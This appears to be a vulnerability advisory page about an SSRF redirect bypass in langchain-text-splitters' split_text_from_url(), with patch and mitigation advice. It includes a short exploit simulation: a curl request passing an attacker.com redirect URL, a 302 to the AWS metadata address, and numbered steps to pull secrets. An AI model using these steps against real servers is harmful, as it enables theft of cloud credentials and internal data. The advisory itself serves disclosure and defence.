Listen to this Post
The vulnerability exists in `HTMLHeaderTextSplitter.split_text_from_url()` which validates the initial URL with `validate_safe_url(allow_private=False)` to block internal/private IPs. However, the actual HTTP request uses `requests.get(url, timeout, kwargs)` with redirects enabled by default. When an attacker supplies a public URL (e.g., `http://attacker.com/redirect`), the initial validation passes because the host is public. The attacker’s server responds with a 302 redirect to an internal endpoint (e.g., `http://169.254.169.254/latest/meta-data/` for AWS IMDSv1, or http://localhost/admin`). `requests.get()` automatically follows the redirect without revalidating the new target againstvalidate_safe_url(). This bypasses the SSRF protection entirely. The response body is parsed into `Document` objects and returned to the application. If the application returns these document contents to the requester, internal data can be exfiltrated. Even without exfiltration, the server can be forced to make arbitrary internal requests (SSRF). The flaw affects versions of `langchain-text-splitters` below 1.1.2 and requires `langchain-core` >=1.2.31 for the patch. The fix replaces `requests.get()` with an SSRF-safe httpx transport (SSRFSafeSyncTransport) that validates DNS and redirect targets on every hop. The `split_text_from_url()` method is deprecated.
<h2 style="color: blue;">dailycve form:</h2>
Platform: langchain-text-splitters
Version: < 1.1.2
Vulnerability: SSRF redirect bypass
Severity: Medium
date: 2025-03-15
<h2 style="color: blue;">Prediction: 2025-03-20</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Check vulnerable version pip show langchain-text-splitters | grep Version Exploit simulation (attacker controlled) curl -i http://victim.com/split?url=http://attacker.com/redirect Attacker's redirect response (302) Location: http://169.254.169.254/latest/meta-data/ Patch verification pip install langchain-text-splitters>=1.1.2 langchain-core>=1.2.31
<h2 style="color: blue;">Exploit:</h2>
1. Host a malicious server returning 302 to internal endpoint.
2. Supplyhttp://attacker.com/evil` to split_text_from_url().
3. Server fetches internal data (e.g., AWS IMDSv1).
4. If app returns response, exfiltrate secrets.
Protection from this CVE:
Upgrade to `langchain-text-splitters >=1.1.2` and langchain-core >=1.2.31. Avoid split_text_from_url(); fetch HTML manually and use split_text(). Set `allow_redirects=False` in custom requests and revalidate each redirect. Block outbound requests to metadata IPs via network policies.
Impact:
Internal service enumeration, cloud metadata theft (AWS IMDSv1), localhost API abuse. Data exfiltration if application echoes document content. No impact on IMDSv2 or header‑protected endpoints.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

